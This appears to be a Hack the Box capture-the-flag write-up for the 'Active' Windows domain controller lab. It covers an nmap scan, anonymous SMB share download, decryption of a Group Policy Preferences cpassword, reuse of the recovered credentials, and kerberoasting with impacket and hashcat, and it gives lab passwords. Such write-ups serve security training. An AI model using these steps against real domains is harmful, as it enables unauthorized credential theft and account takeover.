🏃‍♂️Active Writeup

Hack the Box Active Writeup

We started off with the usual nmap scan using:

nmap -sV -sC 10.129.227.160 > notes

Once this completes and we open our notes we can see that there are a whole lot of ports open. Does this mean we go check every single one? Hell no. Lets look and see what the ports are for and we can see how they are working together.

Nmap scan report for 10.129.227.160
Host is up (0.086s latency).
Not shown: 982 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-29 00:10:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-05-29T00:11:32
|_  start_date: 2022-05-29T00:09:00

We can see that this is a Windows Server 2008 machine and it has SMB, ports 445 and 139 are open. We can also see that it is probably a domain controller because it has AD LDAP running along with Kerberos, AD's authentication ticketing system.

So we know its Windows so we can't approach it the same way we would a Linux machine. To enumerate some more lets run enum4linux.

After running this we can see that there are a few shares that are up, after testing for NULL sessions we know that we only have access to one share, Replication.

Because there was a bunch of random directories and files in this share I went ahead and downloaded them all using this one-liner:

smbclient '\\10.129.227.160\Replication' -N -c 'prompt OFF;recurse ON;cd 'active.htb\';lcd '<dir to save to>';mget *'

After looking through a bit we can see there is interesting data in 'active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml'

<?xml version="1.0" encoding="utf-8"?>
	<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
	</Groups>

In this we can see that this contains a username for an account on the box plus a variable called cpassword. After some research we can see that its a Group Policy Preference file and cpassword can be decrypted very easily by a tool called gpp-decrypt, its built into Parrot and Kali OSs.

After running:

We get the password 'GPPstillStandingStrong2k18'. Lets use it to try to connect to other shares...Bingo. We now have access to the Users share.

smbclient //10.129.227.160/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18

We can get the user.txt file from here.

Side Note: I couldn't get the user.txt file for some reason with smbclient so I ended up using smbmap to grab it.

Ok so back on track now. We need to get Administrator now. After running through a few possible options I realized we are going to need to utilize kerberoasting to get the Administrator account.

For this we are going to use the all might impacket repo. GetUserSPNs.py to be exact. With this we are going to try to grab the Administrator ticket and crack it with Hashcat.

YES!!

Now that we got the Administrator ticket saved we are going to run Hashcat and crack it open like an egg.

And bingo. The password is 'Ticketmaster1968'. Now we can just login and grab the root.txt file and we are done.

PWNED!!